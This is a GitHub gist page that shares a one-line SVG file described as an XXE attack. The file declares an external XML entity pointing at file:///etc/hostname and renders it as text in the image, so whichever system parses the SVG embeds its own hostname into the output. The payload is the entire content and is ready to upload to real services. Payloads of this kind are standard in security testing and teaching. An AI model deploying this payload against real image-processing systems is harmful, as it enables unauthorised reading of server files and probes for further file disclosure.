-
-
Save canozal/86edda91f71c8cb1024449b43f984b79 to your computer and use it in GitHub Desktop.
An SVG "image" that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment